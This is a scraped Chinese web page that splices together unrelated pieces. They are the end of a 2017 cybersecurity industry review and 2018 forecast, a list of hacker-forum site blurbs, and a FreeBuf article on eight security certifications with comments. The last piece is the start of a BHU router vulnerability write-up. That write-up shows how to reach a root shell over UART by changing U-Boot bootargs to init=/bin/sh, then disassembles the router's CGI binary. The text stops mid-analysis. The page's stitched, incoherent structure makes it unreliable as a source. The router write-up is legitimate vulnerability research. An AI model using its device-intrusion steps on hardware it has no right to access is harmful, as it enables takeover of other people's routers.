基于CASB架构的ERP安全公司炼石网络Pre-A融资3000万元;

移动业务安全统一解决方案公司指掌易A+融资1.5亿元。

10月:

移动应用安全公司爱加密(北京智游网安)D轮融资5亿元;

风控反欺诈公司同盾科技C轮融资7280万美元;

数据库安全公司中安威士A+融资2000万元。

11月:

数据安全公司全知科技完成天使轮融资(千万元级)。

12月:

动态防御公司卫达安全Pre-A融资6000万元;

终端安全公司网思科平第二轮融资3500万元;

渗透测试公司四维创智完成天使轮融资(千万元级);

云安全应用公司安百科技A轮融资6000万元;

大数据与云安全公司安数云A轮融资2800万元;

云主机安全公司椒图科技A轮融资8000万元,投资方为360;

自适应安全公司青藤云安全B轮融资近亿元。

2017年国外网络安全融资并购事件频发,涉及公开金额的数字已达300亿美元。据统计,热门领域包括汽车安全、应用安全、机器学习、威胁情报、安全分析等。

2017年国内安全领域创业企业金额总融资额已达35亿人民币,数倍于往年。据统计,反欺诈、大数据、终端安全、云安全、移动安全、数据安全与身份认证均为市场投资的热门领域。

网络安全行业正处于风口,同时前景喜忧参半。由于国家政策以及技术变革的因素,安全行业目前处于风口,各地的安全产业园逐步开始建设,国家也出台了相关的政策引导社会资本的投入。据有关专家研究,国内的安全行业至少还能保持三年的快速增长,不过安全企业如同雨后春笋还需警惕泡沫的出现。

四、行业人才培养

国 际

1、印度反黑客学院成立新公司HLSS,填补人才空缺

2、美国陆军加快步伐招募并留住网络人才

3、日本政府启动培养网络攻击的、高尖端年轻技术人员的计划

国 内

1、学科设立

据调查,网络空间安全是2015年获批设立的工学门类下的一级学科,信息安全则是计算机一级学科下的二级学科。

据教育部消息,全国共940万考生参加2017年高考。经梳理发现,数据科学与大数据技术、物联网工程、网络空间安全等新兴学科增加明显。

北京邮电大学、电子科技大学等8所高等获批网络空间安全专业;

北京印刷学院、太原理工大学等10所高校获批信息安全专业;

华侨大学、长江大学等12所高校新增信息安全专业;

4 所公安院校获批网络安全及执法专业;

北京印刷学院、北京吉利学院等34所高校新增物联网功能专业;

中国人民大学、北京邮电大学等32所高校新增数据科学与大数据技术专业。

2、信息安全专业高校排名

信息是社会发展的重要战略资源,维护网络信息安全至关重要,其中相关人才的培养也是国内的头等大事。据悉,全国共有31所信息安全专业的大学参与排名,其中前10的具体排名情况如下:

2017年网络安全行业大事记

*省内厦门大学和福州大学分别开设网络安全专业和信息安全专业。

▲据调研,9月,教育部公布国内首批一流网络安全学院建设示范高校名单,共有7所高校,分别是:西安电子科技大学、东南大学、武汉大学、北京航空航天大学、四川大学、中国科学技术大学、战略支援部队信息工程大学。

网络安全人才培养存在重大缺口,亟需重视。从目前的安全市场来看,不管是国外还是国内,关于网络安全人才的培养还相对薄弱,人才培养的计划也尚不明确。21世纪人才是最重要的资源,近年来我国高校学历教育培养的信息安全专业人才仅3万余人,而总需求量超过70万余人,人才缺口达到惊人的95%。市场人才可谓是求贤若渴,网络安全人才培养已迫在眉睫。

网络安全专业或将掀起高校报考的狂潮。据悉,我国众多高校关于信息安全、网络安全等相关专业不超过百所。当下全球网络攻击日趋严峻,同时2016年习总书记指出:培养网信人才、要下大功夫、下大本钱,请优秀的老师,编优秀的教材,招优秀的学生,建一流的网络空间安全学院。网络安全以及政策的双重因素下,未来各高校网络安全专业的设立以及人才的培养或将成为网络安全的新浪潮。

五、2018年网络安全趋势预测

第四次工业革命(工业4.0)带来了前所未有的商机,但同时亦增加了网络攻击的必然性。Gartner公司最新的预测数据显示,2018年全球信息安全产品与服务支出总额增加到930亿美元。综合考量2017年经历的网络安全事件,2018年整个网络安全行业的趋势或将:

1、勒索软件攻击者:新的目标和技术

勒索攻击成为网络攻击的一种新常态,攻击方式不断花样翻新。由于用户采用了供应商的防御软件和解决方案,以及加强防范教育和安全策略,传统的勒索软件活动的盈利能力将会继续下降。网络攻击者将调整目标,从传统的目标转向利润更高的勒索目标,其中包括高净值个人、连接设备和企业。

从传统角度看,勒索软件技术的应用将超越个人勒索、网络破坏,以及组织破坏的目标。这种攻击将给对手带来更大破坏和更大财务影响,这不仅会引发网络犯罪“商业模式”的新变种,而且会开始加快推动网络保险市场的扩张。

2、人工智能:机器学习的“军备竞赛”

机器学习可以处理大量的数据,并能够大规模地执行操作来检测和纠正已知的漏洞、可疑行为,以及零日攻击。但是网络黑客正在利用机器学习为他们的攻击提供技术支持,从防御反应中学习,试图破坏检测模型,以及比防御者更快地利用新发现的漏洞。

安全投资人认为,人工智能将是下一代安全解决方案的核心。人工智能防御系统能从黑客攻击事件中,学会各种攻击和防御策略。它能设定正常用户行为的基准,然后搜索异常行为,速度比人类要快得多。这比维持一支专门处理网络攻击的安全团队要省钱得多。人工智能也可以用来制定防御策略。

3、会有更多的僵尸网络物联网(IoT)攻击

2018年,我们将继续看到一些物联网设备被用于僵尸网络活动。不安全的设备仍有很多,对黑客们而言是极易攻击的目标。由于制造商安全能力不足和行业监管缺失,2018年物联网设备的安全威胁将愈演愈烈,对用户的个人隐私、资金财产乃至人身安全造成巨大损失。我国政府在2017年下半年密集出台了推进IPv6、5G、工业互联网等多项前沿科技发展的政策,将助推物联网更快的普及。但其安全威胁也日趋严重,物联网威胁不止是网络安全问题,还将牵涉到人身安全,我们亟需可实施的防护解决方案。

4、云、物联网与数字化推动身份认证技术变革

身份与访问管理(IAM)是一个比较成熟安全领域,但这不意味着没有变化。随着越来越多用户访问远程或者云端资源,身份已经成为当前最主要的攻击对象。此外,云服务、设备、传统软件的结合呈现了越来越多样化的趋势,如何安全地管理身份验证已经成为了一大难题。

5、面部识别技术可能在身份验证中发挥作用

身份验证一般是发布一些证书用于公众可信的数字签名,相比之下,虽然面部识别技术还不够精准,而且缺乏保障,但在2018年仍有可能将它们用于第一阶段的简单电子签名认证。随着这项技术的发展,特别是苹果公司正在使用的配有各种硬件传感器和摄像机的此项技术,在未来的两到四年内,将可能成为等同于面对面身份验证的技术。

6、TLS 1.0和早期的协议将最终成为历史,Https将全网取代Http

今年,在谷歌和Mozilla推动下,HTTPS页面加载和安全站点的数量都有强劲增长。Chrome 56和Chrome62现在将所有带输入字段的网站都标记为不安全网站,Chrome一直都将收集密码或信用卡信息的网站标记为不安全网站。将来所有的HTTP站点都将会被标记为不安全,这只是一个时间问题。

随着谷歌和Mozilla继续向HTTP页面添加越来越多的警告,并且最终这些页面都会得到内有一个醒目红色感叹号的三角形提醒,我们预计HTTPS的采用率会继续显著提高。

7、针对关键基础设施的网络攻击升级,攻防两端的对抗将加剧

2018年以破坏和窃取情报为目的,针对关键基础设施的攻击将逐渐升级:

1、国家力量和恐怖组织、敌对势力推动的,以“网络战”和“恐怖袭击”为目的针对关键基础设施的网络攻击会增加;

2、攻击目标从电力、交通等“命脉”设施,延伸到公共服务系统、重要工业企业的生产设施、互联网关键基础设施;

3、类似永恒之蓝的武器化的攻击工具会愈演愈烈,攻击手段呈现多样化,针对性的勒索攻击风险加剧,间谍事件增多,新型恶意软件和攻击工具增加。

我国相关主管机构也已经组织了多次针对电力、民航等关键基础设施的攻防演习,从已经实施的《网络安全法》到正在征求意见的《关键信息基础设施保护条例》,都将关键基础设施保护上升到了国家战略层面,集中力量、加大投入、创新技术、提升能力将成为保障关键基础设施安全的趋势和方向。

8、培养网络空间安全人才将成为行业热点

以培养和提升网络安全实战能力为目标的攻防演练比赛和网络安全学院成为行业热点。2017年开始,国内攻防演练和攻防比赛的热度开始明显升温,据不完全统计,全年国内各类不同规模的攻防演练超过了100场,各类网络安全攻防比赛的总数近200场,参与比赛人次近60000人。

2018年,攻防演练和攻防会继续成为热点。专家认为,攻防演练将进一步调整演练方法、方式,扩大范围,增强实效;在实战中选好盾、用好矛,分层分类分级解决安全问题,推进演练模式多样化;时间上从年度演练或不定期演练向全年常态化延伸;模式上从比赛式向研究式解决问题延伸;方法上从背靠背向面对面延伸,刚柔相济、重点帮扶,在解决军民融合问题上寻求更大的突破和亮点。

9、政企机构将从购买安全产品转变到购买安全服务

安全实施演变成安全能力交付,政企机构从购买产品到购买服务,安全服务化将快速成长。随着网络安全威胁形势的不断变化,以及越来越严苛的网络安全监管环境,政企用户对于安全的需求在不断增强,他们的安全需求从基本合规逐步转向真正的安全防护需求。

2018年,政企用户在网络安全方面的支出将进一步增加,以服务的形式购买安全能力、以云的方式交付安全能力将成为趋势。“安全服务特别是IT外包、咨询与实施部署服务将成为增长速度最快的细分领域。同时客户对于附加硬件支持的整体需求将不断下降。”

10、个人数据隐私保护将通过法律等技术手段向前推进务

隐私保护从争议话题开始迈向通过法律和技术方案的务实推进。为应对云计算、大数据、移动互联网及跨境数据处理等应用场景所带来的新挑战,2016 年欧盟通过了新的数据保护法案《一般数据保护条例》(GDPR),并将于 2018 年5月生效。2018年,超过50%的公司将受到GDPR影响,且将会制造新一轮热点,驱动2018年数据安全市场投入增加65%。

目前我国没有统一的个人信息保护法,但是通过“徐玉玉案”等一系列案件给社会带来的不良影响,使人们充分意识到了个人信息泄露和滥用所带来的严重社会危害,同时也催生个人信息保护立法落地。

尽管网络威胁值得各行各业加以关注,但是据有关人士指出,银行行业、金融服务业与保险业、医疗卫生行业、零售行业、电信行业、制造业、政府机构等行业在未来发展的道路中都将存在潜在的网络安全威胁,其网络安全保障的发展道路还相当漫长!

我们已经告别2017年,迎来崭新的2018年,人工智能、5G、虚拟现实等新兴技术正在向我们招手。网络“战场”的攻与防远远还没有停止,未来将是一个不变的话题,没有网络安全就没有国家安全,保护网络空间安全,维护网络空间命运共同体将是这个时代赋予企业和从业人员的重大使命。

0daybank

黑客论坛

HACK80_最专业的黑客技术论坛

提醒:该页面因站点更换网址或服务不稳定等原因可能无法正常访问!了解详情
HACK80是集黑客技术交流、黑客工具分享的黑客论坛,与传统黑客联盟不同,我们在守法的前提下提倡自由的技术交流,力求成为一个气氛优秀的技术圈子。

免费黑客网,黑客技术入门教程 – 危险漫步博客

危险漫步的个人博客,黑客技术相关研究及思考;攻与防的对立,是中国访问量最大的黑客博客,拥有大量活跃读者,九…

:::中国黑客联盟::: www.ChinaHacker.com 欢迎登陆 China Hacker …

关于我们 | 分站申请 | DDOS防御 | 技术论坛?| 站内导航 | 合作伙伴 | …版权所有 中国黑客联盟 (Hacker Union For China V 6.22) 闽ICP备05007859号 …

黑客基地论坛

但随着网络的推广与普及,许多黑客也将目光对准了这一领域。由于他们技术娴熟、…网络安全公司Malwarebytes在本周一(10月29)发布的消息称,其论坛成员1vladimir注意…

黑客技术论坛?– 红黑联盟

黑客技术论坛:泄露数据告诉你,黑客论坛Nulled IO用户都用哪些密码?2013年,国外老牌技术新闻和信息分

吾爱漏洞 – 国内最专业的黑客技术博客!

吾爱漏洞,专注于黑客技术研究及思考,是一个综合性的黑客入门技术分享交流、资源共享博客。

转载请注明来自freebuf黑客与极客 – FreeBuf互联网安全新媒体平台

FreeBuf,国内领先的互联网安全新媒体,同时也是爱好者们交流与分享安全技术的社区。…?黑客?漏洞 安全工具 WEB安全 系统安全 网络安全 无线安全 设备/客户端安全 …

…免杀,入侵,攻防,黑客编程,扫描,破解等首选独特黑客论坛! – …

独特论坛?登录 注册?论坛?精彩热帖 搜索帖子 ?★独☆特★新☆手★区★ …35QQ黑客{QQ technology} 1502 / 16万 1 小时前 ?独特黑客技术专区 49程序…

小风教程网-黑客_免费黑客网_黑客技术教程_黑客软件工具

小风教程网是最好免费黑客网!致力于黑客技术学习的正规运用,普及黑客网络安全知识,汇聚最新黑客软件、黑客工具,为您提供从基础到深入的黑客技术学习平台。

CN-HACK.NET-中国黑客榜中榜

黑客门户?黑客论坛?网络安全 黑客兵器 黑客游戏 病毒防御 黑客博客 黑客微博 【收藏本站】 推荐系列 ? SILIC安全 ? 360安全播报 ? 3k博客 ? 阿德马博客…

0daybank

freebuf

FreeBuf互联网安全新媒体平台

FreeBuf,国内领先的互联网安全新媒体,同时也是爱好者们交流与分享安全技术的社区。… 精品公开课?FreeBuf匠心打造精品高端课程 普通公开课 分享安全领域的知识与智慧。FreeBuf是一片国内外极客的聚集地,在这里你可以找到极客软件分享,学习极客技术知识。… 精品公开课?FreeBuf匠心打造精品高端课程 普通公开课 分享安全领域的知识0daybank

安全认证

安全认证

投稿

你值得拥有的8大国际安全认证

secist2017-03-12208143人围观 ,发现 17 个不明物体安全管理资讯

1.jpg

随着网络安全问题的日益突出化,网络安全也越来越受到人们的重视。从高校到企业,从普通民众再到国家层面,网络安全开始贯穿我们的整个生活。2016年发生了许多攻击事件,几乎所有联网的个人或企业甚至国家都难以幸免。因此,网络安全的人才也越来越受到企业的青睐,市面上也开始出现了种类的证书培训机构。那么,哪些证书的含金量高,值得我们去考呢?以下,我为大家整理出了8大你值得拥有的安全认证。

cissp-logo-stacked.png

CISSP(认证注册信息系统安全师)

CISSP 英文全称:“Certified Information Systems Security Professional”,中文全称:“(ISC)?注册信息系统安全专家”,由(ISC)?组织和管理,是目前全球范围内最权威,最专业,最系统的信息安全认证。CISSP对行业各领域的安全专业人员都有认证,包括软件开发,信息安全和医疗保健等。

该组织以信息系统安全专业人员(CISSP)认证而闻名。专家需在CISSP公共知识体系(CBK)的八个领域获得认证,它们分别为:安全和风险管理,资产安全,安全工程,通信和网络安全,身份和访问管理,安全评估和测试,安全操作和软件开发安全 。

这种认证,一般是为已经具备软件开发,并能实施和管理企业安全计划的安全专家而准备的。

认证条件:在信息系统安全CBK规定的8个考试领域中,最少拥有2个范围的专业经验5年。这对那些通过测试,而缺乏经验的人是一个障碍。

考试:CISSP认证的信息系统安全专业人员考试(共250题,时间为:6小时,分数占比70%为通过)

考试费用约为:$ 599 美元

相关链接:

概述

培训材料

在线课程

certs-oscp.png

OSCP(渗透测试认证)

OSCP认证,是一个专门针对Kali Linux渗透测试培训课程的专业认证。该认证机构声称,OSCP认证是一个区别于所有其它认证的考试,考试全程采取手动操作的方式,而不设笔试环节。

每个OSCP考生,都拥有24小时的时间(实际是23小时45分钟)去完成考试,具体如何分配时间由考生自己决定。题目是5台主机(随机抽取),目标是攻入并拿到最高权限(ROOT/SYSTEM)。基于难度级别,成功执行的攻击会获得相应的积分。

认证条件:

考试:OSCP的认证考试也是另类的存在,考生拥有24小时的时间(实际是23小时45分钟)去完成考试,具体如何分配时间由考生自己决定。题目是5台主机(随机抽取),目标是攻入并拿到最高权限(ROOT/SYSTEM)。24小时结束之后,你还有24小时去完成并提交考试报告(需要详细说明攻击步骤和里程碑截屏来证明确实攻破并获得相应权限)。

考试费用约为:$ 800 美元(30天实验室访问+认证)

相关链接:

概述

培训材料

certs-hcispp.png

HCISPP(认证医疗信息与隐私安全员)

Shearer 说:医疗保健行业,已经成为网络攻击的主要目标之一。随着医疗保健机构面临的安全风险日益增加,医疗保健行业的安全人才变得炙手可热。

(ISC)?为保护医疗数据的安全人员,提供了医疗信息与隐私安全员(HCISPP)认证。考试评估HCISPP CBK六个领域的知识,分别为:医疗保健行业,环境监管,医疗保健的隐私和安全,信息治理和风险管理,信息风险评估和第三方风险管理。

认证条件:在相关领域至少有2年的全职工作经验。其中一年,必须是前三个医疗保健领域(医疗保健行业,环境监管,以及医疗保健的隐私和安全)的任何组合。

考试:HCISPP医疗信息与隐私安全员(考试时间为:3小时,共125个题目,占比70%通过)

考试费用约为:$?349美元(美洲)

相关链接:

概述

培训材料

comptia-securityplus.png

CompTIA Security+(美国计算机行业协会安全认证)

CompTIA Security + 被认为是一本入门级的认证。虽然该认证不需要过多的经验,但参与考试的考生通常需要具备一定的专业知识,并且需在该领域至少拥有2年的工作经历。

CompTIA Security + ?认证涵盖了网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力认证。

认证条件:无,但建议考生最好已拥有CompTIA Network +认证和至少两年的IT安全管理经验。

考试:CompTIA?Security +(考试时间为:90分钟,90个题目左右,750/900分为通过)

考试费用约为:$?320?美元

相关链接:

测试准备

CompTIA CertMaster?– (不是必须的)

certs-gsec.png

GIAC安全要素认证(GIAC Security Essentials,GSEC)

GIAC安全要素认证,是由SANS研究所颁发的。主要用于对安全专业人员专业知识的考察。 申请人必须对包括 IP分组,网络协议,DNS,TCP,策略框架,网络映射,认证,事件响应以及病毒和恶意代码在内的,各种安全知识有着较为深入的理解。

认证条件:无。考生可自主选择,是否参加包括考试费的培训课程。

考试:(180个题目,考试时间为:5个小时,及格分数73%)

考试费用约为:$1,249 美元

相关链接:

更多细节

概述

certs-ccsp.png

CCSP(认证云安全专家)

来自(ISC)的云安全专家(CCSP)认证?面向专注于云的专业人员。随着越来越多的企业使用云,云安全无疑也成为了企业关注的焦点。CCSP主要评估六个领域的能力:云数据安全,架构概念和设计要求,云平台和基础设施安全,云应用安全,运营和法律。

Shearer 说: “人们对于云的安全性还有诸多疑虑。因此,需要有人能够以安全有效的方式,将他们的组织迁移到云。

CCSP 针对专业人员的认证,申请者必须具备至少5年的全职IT工作经验,并且至少有三年是在信息安全领域,以及一年在云安全领域。

认证条件:

考试:云安全专家认证(考试时间为:4小时,共125个问题,及格分数70%)

考试费用约为:$ 549 美元(美洲)

相关链接:

训练研讨

考试大纲

Screen-Shot-2017-02-17-at-1.42.33-PM.png

CISM(认证信息安全经理)

信息系统审计与控制协会(Information Systems Audit and Control Association,ISACA)认证,主要包括信息安全经理(CISM)和信息系统审计师(Certified Information Systems Auditor,CISA)认证。

CISM可以确保持证人掌握信息安全知识,信息安全项目开发与管理知识。他们具有良好的合规性,能确保安全和业务目标之间的一致性,以及开发和管理信息安全计划的能力。

认证条件:至少有五年的信息安全相关工作经验,或至少有三年的信息安全管理经验。工作经验,必须在认证申请之日起的10年内完成。

考试:信息安全经理认证(共200题,合格分数为:450分)

考试费用约为:会员 $ 465 美元; 非会员 $ 595 美元

相关链接:

研究材料

复习课程

cwsp.png

CWSP(认证无线安全专家)

CWSP(认证无线安全专家)认证,是来自认证无线网络专业人员(CWNP)组织的专业级无线局域网认证。

CWSP 主要评估网络安全专业人员对无线软件,工具,趋势和技术的理解。考试中涉及的具体领域包括:WLAN发现技术,入侵和攻击技术,无线入侵防御系统(WIPS)实施,802.11协议分析,以及通过802.11网络使用的,第2层和第3层VPN等。

CWSP是CWNP认证无线网络专家(CWNE)认证的一部分,这是其认证无线网络专业(CWNP)计划的最后一步。申请人经过多年的经验积累,力求获取CWNE认证,以证明其专业水平。

认证条件:

考试:认证无线安全专家(考试时间为:90分钟,共60个问题,及格分数70%)

考试费用约为:?$ 225 美元

相关链接:

关于CWNP

注册

*参考来源 :DarkReading,FB小编 secist 编译,转载请注明来自FreeBuf.COM

这些评论亮了

  • hblf回复
    2016拿下了CISSP,争取未来三年再拿下一个!
    )7(亮了
  • 用户6110833146回复
    求帮助。今天我玩手游然后说可以帮忙刷元宝,我转了一千多块钱过去,然后没有给我刷,还把我游戏里的元宝拿走了一千四百多个。这有办法解决吗?
    )7(亮了
发表评论

已有 17 条评论

  • MyKings?(2级)?2017-03-12回复1楼

    居然没有CEH

    亮了(3)
  • hblf?2017-03-12回复2楼

    2016拿下了CISSP,争取未来三年再拿下一个!

    亮了(7)
  • 用户6110833146?2017-03-12回复3楼

    求帮助。今天我玩手游然后说可以帮忙刷元宝,我转了一千多块钱过去,然后没有给我刷,还把我游戏里的元宝拿走了一千四百多个。这有办法解决吗?

    亮了(7)
    • DDvv?(3级)一只特立独行的猪?2017-03-13回复

      @ 用户6110833146 建议多读书,多看资讯,少玩网游,让大脑健康发展。

      亮了(3)
    • ArthurKiller?(7级)窃.格瓦拉驻FreeBuf办事处?2017-03-13回复

      @ 用户6110833146 少玩游戏多看书,少生孩子多养猪

      亮了(3)
    • 弹幕免疫者郭敬明?(1级)?2017-03-13回复

      @ 用户6110833146 晃一晃大脑,你听,海哭的声音

      亮了(1)
  • softbug?(7级)011101000110100001100001011011…?2017-03-12回复4楼

    有没有一种认证是不收费的? 什么都不缺了,就缺钱。

    亮了(3)
    • secist?(6级)每个人的心中都有一个梦。。?2017-03-12回复

      @ softbug? 没钱就洗洗睡吧

      亮了(2)
    • deep4ox?(3级)?2017-03-13回复

      @ softbug? 自签名证书

      亮了(3)
  • a2465?(1级)这家伙太懒了,还未填写个人描述!?2017-03-12回复5楼

    我想问下 这个网站有没有qq群 用户交流群之类的?

    亮了(0)
  • 你叫何志武是吧?2017-03-12回复6楼

    哈哈,我没想都达成。太贵了

    亮了(1)
  • 大头君儿?2017-03-12回复7楼

    大师现在1/8 ?

    亮了(0)
  • Syne?(1级)做奥利奥的?2017-03-12回复8楼

    隔壁专业毕业有个GCHQ证书,就是对外国人来说没什么用啦

    亮了(0)
  • x1aoh0n?(2级)信息安全工程师?2017-03-13回复9楼

    除了CISSP看起来很受到认可之外 其他的有必要考吗?

    亮了(0)
  • victorwang?(1级)信息安全工程师?2017-03-13回复10楼

    写的还是很受认可的,以为能出现CISP,没出现就证明很客观。其实做信息安全有CISSP就很不错了。

    亮了(0)
  • mvpbin?2017-03-18回复11楼

    提醒一下大家Comptia security+认证考试今年夏天考试会出新版本 到时候会没资料复习 所以想考的人尽量6月份之前考了

    亮了(1)
  • zoonctrl?(5级)该怎么做好信息安全??2017-04-08回复12楼

    证书只是辅助,关键还是高度和思路!

    亮了(2)
表情插图

取消

secist

secist

每个人的心中都有一个梦。。

49 篇文章18 条评论

相关阅读

  • 国内某知名应用市场遭仿冒,EvilPea病毒也玩起O2O
  • 雅虎某团体的6500万Tumblr账户数据在黑市热卖
  • 超3200万Twitter账户密码泄露,Twitter表示“不能怪我”!
  • 流行应用AddThis存在postMessage XSS漏洞漏洞,百万站点受影响
  • 专访知名民间黑客洪流:未竟武侠梦,仗剑行天涯

特别推荐

关注我们 分享每日精选文章

不容错过

  • [Blackhat]2014美国黑帽大会有哪些精彩的议题?FB情报组2014-08-07
  • 如何基于菜刀PHP一句话实现单个文件批量上传?安全小飞侠2015-12-28
  • FreeBuf公开课:Wi-Fi安全与渗透测试(第一集)FB视频2015-03-25
  • Hacking Team流量攻击之EXE攻击分析LiukerTeam2016-01-23

css.php

正在加载中…

0daybank

必虎

必虎

投稿

必虎路由器大量高危漏洞分析

ArthurKiller2016-08-25313958人围观 ,发现 14 个不明物体终端安全资讯

前言

这件事情还得从几个月前说起。有一名叫做Tao Sauvage的老外开开心心的来中国旅游。想着得带点中国的土特产回去,选了半天,选中了一款叫做必虎的无线路由器。

QQ截图20160823122219.png

看着这个超低的价格和完美的做工,这个老外感觉自己赚大发了,简直是天赐礼物!249!买不了吃亏!249!买不了上当!必虎的英文翻译叫做“Tiger Will Power”,我擦!叼炸天的名字啊!虎之力路由器!感觉身体被掏空!但是因为是国产路由器,谷歌翻译也不准确,他也不懂中文。

QQ截图20160823125031.png

怎么办呢?把路由器拆开研究一下看看吧!橙色的地方可以插入一个SD卡,而红色的地方是UART引脚。故事(漏洞),就是从这里开始的,然后以下的“他”将由第一人称来叙述。

QQ截图20160823125430.png

提取路由器固件

废话不多说,直接拿BusPirate连接上这些引脚再说!

Bp-action-2ii.jpg

开启设备后查看自己的终端,返回了以下信息。

QQ截图20160823130252.png

它说按下任意键继续。好吧,这个我随便按了键,然后看到了菜单设置。

##################################

#?? BHU Device bootloader menu?? #

##################################

[1(t)] Upgrade firmware with tftp //通过tftp对固件进行升级

[2(h)] Upgrade firmware with httpd //通过httpd对固件进行升级

[3(a)] Config device aerver IP Address //设置设备服务器的IP地址

[4(i)] Print device infomation //打印设备信息

[5(d)] Device test //设备测试

[6(l)] License manager //许可证管理

[0(r)] Redevice //控制器

[ (c)] Enter to commad line?(2) //按下c查看其它命令

先按下C发现它用的是U-boot,那么可以对其bootargs参数进行设置,这样就不再局限于init程序内了。

Please input cmd key:

CMD> printenv bootargs

bootargs=board=Urouter console=ttyS0,115200 root=31:03 rootfstype=squashfs,jffs2 init=/sbin/init(3)?mtdparts=ath-nor0:256k(u-boot),64k(u-boot-env),1408k(kernel),8448k(rootfs),1408k(kernel2),1664k(rescure),2944kr),64k(cfg),64k(oem),64k(ART)

CMD> setenv bootargs board=Urouter console=ttyS0,115200 rw rootfstype=squashfs,jffs2 init=/bin/sh(4)?mtdparts=ath-nor0:256k(u-boot),64k(u-boot-env),1408k(kernel),8448k(rootfs),1408k(kernel2),1664k(rescure),2944kr),64k(cfg),64k(oem),64k(ART)

CMD> boot

然后再使用printenv命令查看了U-boot的基本设置情况,然后发现只要引导顺序完成,就会运行“/sbin/init”,而这个二进制文件主要负责初始化路由器的Linux系统的。我们使用setenv命令把‘/sbin/init’ 和 ‘/bin/sh’替换一下,要不然是没有办法访问系统文件的。然后再使用boot命令继续刚才的引导。以上几步操作完成后,我们成功的进入了shell命令界面,如下所示。

BusyBox v1.19.4 (2015-09-05 12:01:45 CST) built-in shell (ash)

Enter ‘help’ for a list of built-in commands.

# ls

version ?upgrade ?sbin ? ? proc ? ? mnt ? ? ?init ? ? dev

var ? ? ?tmp ? ? ?root ? ? overlay ?linuxrc ?home ? ? bin

usr ? ? ?sys ? ? ?rom ? ? ?opt ? ? ?lib ? ? ?etc

QQ截图20160823170005.png

千辛万苦,现在我已经可以通过shell命令访问路由器,并且提取固件。接下来我可以分析必虎路由器的通用网关接口和WEB界面了。当然,有很多种方式可以提取这个路由器的固件,我采用的是修改U-Boot参数开启网络,把全部的文件复制到我的电脑上。感兴趣的朋友可以看看这篇文章:《LinuxBootArgs》

逆向分析

现在我需要对这些文件进行整理。首先,我得知道哪些文件是属于web管理接口的,而下面这个是路由器的初始设置。

# cat /etc/rc.d/rc.local

/* [omitted] */

mongoose -listening_ports 80 &

/* [omitted] */

这个Mongoose程序开启了80端口,很熟悉的端口啊!估计这个程序就是必虎路由器的WEB服务器程序了。功夫不负有心人,我还是找到了这个WEB程序的相关文档:《mongoose》。根据文档所示,Mongoose会把WEB目录下的所有文件解析为.cgi后缀。如下面所示。

# ls -al /usr/share/www/cgi-bin/

-rwxrwxr-x ? ?1 ? ? 29792 cgiSrv.cgi

-rwxrwxr-x ? ?1 ? ? 16260 cgiPage.cgi

drwxr-xr-x ? ?2 ? ? ? ? 0 ..

drwxrwxr-x ? ?2 ? ? ? ?52 .

这个路由器的WEB界面主要依赖于两个非常重要的文件。

cgiPage.cgi:这个文件主要是负责控制面板内的页面排序功能

cgiSrv.cgi:这个文件主要是负责后台管理的各个组件的功能

cgiSrv.cgi这个文件是最有意思的,它可以对路由器所有的设置进行更新,所以我打算先从它开始下手。

$ file cgiSrv.cgi

cgiSrv.cgi: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked (uses shared libs), stripped

我使用IDA对其进行逆向分析。虽然这个文件已经剥离了所有的调试符合,包括函数名之类的,但是从main函数开始,这个文件变的有意思起来。

LOAD:00403C48? # int __cdecl main(int argc, const char **argv, const char **envp)

LOAD:00403C48???????????????? .globl main

LOAD:00403C48 main:??????????????????????????????????? # DATA XREF: _ftext+18|o

/* [omitted] */

LOAD:00403CE0???????????????? la????? $t9, getenv

LOAD:00403CE4???????????????? nop

(6)?# 检索请求方式

LOAD:00403CE8??? ?????????????jalr??? $t9 ; getenv

(7)?# arg0 = “REQUEST_METHOD”

LOAD:00403CEC?? ??????????????addiu?? $a0, $s0, (aRequest_method – 0x400000)? # “REQUEST_METHOD”

LOAD:00403CF0???????????????? lw????? $gp, 0x20+var_10($sp)

LOAD:00403CF4????????? ???????lui???? $a1, 0x40

(8)?# arg0 = getenv(“REQUEST_METHOD”)

LOAD:00403CF8???? ????????????move??? $a0, $v0

LOAD:00403CFC???????????????? la????? $t9, strcmp

LOAD:00403D00???????????????? nop

(9)?# 检查请求方式是否为POST

LOAD:00403D04???? ????????????jalr??? $t9 ; strcmp

(10)?# arg1 = “POST”

LOAD:00403D08???? ????????????la????? $a1, aPost?????? # “POST”

LOAD:00403D0C???????????????? lw????? $gp, 0x20+var_10($sp)

(11)?# 如果请求方式不是POST就进行跳转 LOAD:00403D10???? ????????????bnez??? $v0, loc_not_post

LOAD:00403D14???????????????? nop

(12)?# 如果请求方式是POST就调用handle_post

LOAD:00403D18???? ????????????jal???? handle_post

LOAD:00403D1C???????????????? nop

/* [omitted] */

同样的逻辑也试用于GET类型的请求。如果收到了GET类型的请求,那么会调用相关的函数,并且重命名为handle_get。让我们一起来看看handle_get函数部分。

img4.png

上面这个模块流程图主要展示了程序内的“if {} else if {} else {}”判断流程。每个函数部分都会检查数据包是否是GET类型的。我们先来看看A模块吧。

/* [omitted] */

LOAD:00403B3C loc_403B3C:???????????????????????? ?????# CODE XREF: handle_get+DC|j

LOAD:00403B3C?????? ??????????la????? $t9, find_val

(13)?# arg1 = “file

LOAD:00403B40??? ?????????????la????? $a1, aFile?????? # “file”

(14)?# 在URL内检索“file”参数的value

LOAD:00403B48?? ??????????????jalr??? $t9 ; find_val

(15)?# arg0 = url

LOAD:00403B4C? ???????????????move??? $a0, $s2? # s2 = URL

LOAD:00403B50???????????????? lw????? $gp, 0x130+var_120($sp)

(16)?# 如果没有“?file=”参数,那么就跳转其他页面

LOAD:00403B54???? ????????????beqz??? $v0, loc_not_file_op

LOAD:00403B58? ???????????????move??? $s0, $v0

(17)?# 如果有“file”,那么调用handler

LOAD:00403B5C?? ??????????????jal???? get_file_handler

LOAD:00403B60? ???????????????move??? $a0, $v0

在A模块,handler_get函数会先检查在URL内的file参数,并且调用find_val,如果file参数出现在URL内,那么该函数会调用get_file_handler。

LOAD:00401210 get_file_handler:??????????????????????? # CODE XREF: handle_get+140|p

/* [omitted] */

LOAD:004012B8 loc_4012B8:????????????????????????????? # CODE XREF: get_file_handler+98j

LOAD:004012B8???????????????? lui???? $s0, 0x41

LOAD:004012BC???????????????? la????? $t9, strcmp

(18)?# arg0 = “file”参数的值

LOAD:004012C0???? ????????????addiu?? $a1, $sp, 0x60+var_48

(19)?# arg1 = “syslog”

